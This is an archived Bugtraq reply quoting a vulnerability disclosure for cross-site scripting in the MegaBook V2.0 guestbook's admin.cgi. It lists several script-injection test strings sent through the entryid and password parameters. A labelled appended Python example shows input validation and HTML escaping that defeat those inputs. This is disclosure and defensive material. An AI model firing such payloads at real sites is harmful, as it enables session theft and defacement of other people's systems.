Bugtraq mailing list archives
Re: MegaBook V2.0 - Cross Site Scripting Exploit
From: Morning Wood <wood () exploitlabs com>
Date: 6 May 2005 07:18:31 -0000
In-Reply-To: <20050505104551.23441.qmail () www securityfocus com>

umm.. http://exploitlabs.com/files/advisories/EXPL-A-2003-011-megabook-2.0.txt

Subject: MegaBook V2.0 - Cross Site Scripting Exploit

The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook.

The affected script is admin.cgi
URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)

I have tested the script with the following query:
?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>

I have also tested the script with these POST variables:
action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>
action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>
action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>

Yours,
SpyHat

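An added example, not part of the thread and not MegaBook's own code: a sketch of the server-side handling that stops the kind of input quoted in the report from being reflected as markup, by validating `entryid` as a number and HTML-encoding any echoed text. The function names, the form layout and the `entry` textarea are assumptions made for illustration; the sample inputs are constructed.

```python
import html
import re

# Constructed inputs modeled on the test strings quoted in the report
# (attribute break-outs with ", ', no quote, and a </textarea> break-out).
REPORTED_STYLE_INPUTS = [
    "<script>alert(1);</script>",
    "'><script>alert(1);</script>",
    "\"><script>alert(1);</script>",
    "><script>alert(1);</script>",
    "</textarea><script>alert(1);</script>",
]

ENTRY_ID_RE = re.compile(r"[0-9]{1,10}")


def parse_entry_id(raw):
    """Accept only a short decimal entry id; anything else is rejected."""
    if isinstance(raw, str) and ENTRY_ID_RE.fullmatch(raw):
        return int(raw)
    return None


def render_modify_form(entryid_raw, entry_text_raw):
    """Hypothetical modifypost form: validates entryid, escapes echoed text."""
    entry_id = parse_entry_id(entryid_raw)
    if entry_id is None:
        # Do not echo the rejected value back into the error page.
        return "<p>Invalid entry id.</p>"
    # quote=True also encodes " and ', so the value cannot leave an attribute.
    safe_text = html.escape(entry_text_raw, quote=True)
    return (
        '<form method="post" action="admin.cgi">\n'
        f'<input type="hidden" name="entryid" value="{entry_id}">\n'
        # The password field is never pre-filled from the request.
        '<input type="password" name="password" value="">\n'
        f'<textarea name="entry">{safe_text}</textarea>\n'
        "</form>"
    )


if __name__ == "__main__":
    for sample in REPORTED_STYLE_INPUTS:
        print(render_modify_form("66", sample))
        print(render_modify_form(sample, "hello"))
```
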
Current thread:
- MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 05)
- <Possible follow-ups>
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Morning Wood (May 06)
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 09)